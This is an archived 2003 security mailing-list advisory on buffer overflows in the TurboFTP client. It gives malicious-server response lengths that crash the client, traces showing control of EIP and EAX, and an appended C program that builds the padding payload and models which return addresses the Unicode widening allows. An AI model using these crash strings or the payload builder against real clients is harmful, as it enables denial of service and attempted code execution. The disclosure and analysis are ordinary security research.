Vulnwatch mailing list archives

Buffer Overflow Vulnerabilities in TurboFTP


From: "Peter Winter-Smith" <peter4020 () hotmail com>
Date: Thu, 10 Jul 2003 21:01:12 +0000

Buffer Overflow Vulnerabilities in TurboFTP

Url: http://www.turboftp.com

From the vendor's website ...

        "TurboFTP is a secure FTP client program for Windows
9x/ME/NT4/2000/XP. It allows you to transfer files (upload or
download) at turbo speed between your computer and virtually
any FTP server with exceptional ease."

        "With an intuitive user interface, a wealth of features
and secure file transfer capability, TurboFTP is the right
software tool for tasks like uploading Web site, scheduled file
synchronization and backup, and mission critical corporate file
transfers."

And I certainly can't argue with that; it's certainly in my top
twenty FTP clients list!

It is also vulnerable to a buffer overflow attack from a
malicious FTP server sending an overly long response at
any time during the connection.

The data being supplied by the server is placed, unicoded, into
a buffer around 1000 bytes long.
This means that normal buffer overflow attack techniques cannot
be used to exploit this vulnerability.

Interesting responses:

(TurboFTP connected...)
220 [1061xA]
(Access violation in user32.dll)

(TurboFTP connected...)
    PADDING    EIP
220 [1061xA][*][2xX] // Totalling 1063 Bytes
(Access violation in turboftp.exe when executing 0x00580058)
// 2xX Unicoded

* The base pointer register cannot be altered as far as I can see,
which is why I have not included it.

(TurboFTP connected...)
    PADDING
220 [8000xA]
(Access violation in comctl32.dll)

(TurboFTP connected...)
    PADDING EAX
220 [8574xA][4xX] // Totalling 8578 Bytes
(Access violation in turboftp.exe; EAX = 0x58585858)

I could not find an address which my buffer could write to
on the stack which was similar to:

0x00SS00??

Where SS is an address on the stack, thus I was unable to exploit
the vulnerability to any extent past that of a simple DoS attack.

If anyone manages this, I would be most interested to hear how
it was achieved.

Nevertheless, I have contacted the vendor, and they may issue
a patch if this is found to be anything which could lead to a
remote system compromise or code execution of any type.

======================================================================


Operating system and servicepack level:
Windows 9x/Me/NT Based


Software:
TurboFTP 3.85 Build 304 (Possibly Earlier Versions)


Under what circumstances the vulnerability was discovered:
Under a vulnerability search.


If the vendor has been notified:
Yes, the vendor has been notified.


How to contact you for further information:
I can always be reached at peter4020 () hotmail com


Please credit this find to:
Peter Winter-Smith


Thank you for your time,
-Peter
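Added illustration (editorial, not code from the original post and not TurboFTP's code): a simulation of the ANSI-to-UTF-16 widening copy the post describes, showing why "XX" lands in EIP as 0x00580058 and why only addresses of the form 0x00??00?? can ever be written. The frame layout (a 1061-wide-character buffer sitting directly under the saved return address, no saved EBP in between), the "status text after the 220 code" model and the rule that the two payload bytes must be non-NUL and not CR/LF are all assumptions made for the example, not facts from the advisory.

```c
/* Added example, not from the original post or from TurboFTP.
 * Models a fixed stack frame into which a server response is copied
 * after ANSI->Unicode widening, with no length check. All layout
 * numbers below are assumptions chosen to mirror the post's 1061-byte
 * padding; the real binary's frame is not known from the advisory. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_CHARS   1061                 /* assumed wide chars before EIP slot */
#define FRAME_BYTES (PAD_CHARS * 2 + 4)  /* widened buffer + saved return addr */

/* Widen every input byte b to the little-endian 16-bit unit {b, 0x00},
 * as an ANSI->Unicode conversion would, and copy bounded only by the
 * modelled frame (i.e. past the end of the real buffer).
 * Returns the 32-bit value that ended up in the return-address slot. */
uint32_t widen_copy(const char *text, size_t len)
{
    uint8_t frame[FRAME_BYTES];
    memset(frame, 0, sizeof frame);
    for (size_t i = 0; i < len && 2 * i + 1 < sizeof frame; i++) {
        frame[2 * i]     = (uint8_t)text[i];
        frame[2 * i + 1] = 0x00;          /* every odd byte is forced to NUL */
    }
    const uint8_t *r = frame + PAD_CHARS * 2;
    return (uint32_t)r[0] | (uint32_t)r[1] << 8
         | (uint32_t)r[2] << 16 | (uint32_t)r[3] << 24;
}

/* Can `addr` be produced by the widening copy at all?
 * - both high bytes of the two 16-bit units must be 0x00 (0x00??00??);
 * - the two low bytes must be transmittable inside one response line:
 *   not NUL (string copy) and, by assumption, not CR/LF (line end). */
int reachable(uint32_t addr)
{
    if (addr & 0xFF00FF00u)
        return 0;
    uint8_t b[2] = { (uint8_t)(addr & 0xFF), (uint8_t)((addr >> 16) & 0xFF) };
    for (int i = 0; i < 2; i++)
        if (b[i] == 0x00 || b[i] == '\r' || b[i] == '\n')
            return 0;
    return 1;
}

/* Build the status text that follows "220 ": PAD_CHARS filler bytes and
 * then the two bytes whose widened form is `addr`.
 * Returns the payload length, or 0 if `addr` is not reachable. */
size_t build_payload(uint32_t addr, char *out, size_t cap)
{
    if (!reachable(addr) || cap < PAD_CHARS + 2)
        return 0;
    memset(out, 'A', PAD_CHARS);
    out[PAD_CHARS]     = (char)(addr & 0xFF);
    out[PAD_CHARS + 1] = (char)((addr >> 16) & 0xFF);
    return PAD_CHARS + 2;
}

/* End to end: build the text for `addr`, push it through the widening
 * copy and return what landed in EIP (0 if it cannot be expressed). */
uint32_t demo_eip(uint32_t addr)
{
    char text[PAD_CHARS + 2];
    size_t n = build_payload(addr, text, sizeof text);
    return n ? widen_copy(text, n) : 0;
}

int main(void)
{
    /* 1061 x 'A' + "XX" (1063 bytes), as in the post's second trace. */
    printf("\"XX\" after padding -> EIP = 0x%08x\n", demo_eip(0x00580058u));
    /* A typical library address has non-zero high bytes: unreachable. */
    printf("0x7C801234 reachable? %d\n", reachable(0x7C801234u));
    /* Zero high bytes but a CR in the low unit's high byte: unreachable. */
    printf("0x00400D11 reachable? %d\n", reachable(0x00400D11u));
    return 0;
}
```

The `reachable` check is the formal version of the post's "0x00SS00??" observation: whatever the two payload bytes are, the widening fixes the second and fourth bytes of EIP to zero, so a return into a normal DLL or into the stack (whose high byte is not zero) is off the table, which is why the author stopped at a denial of service.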
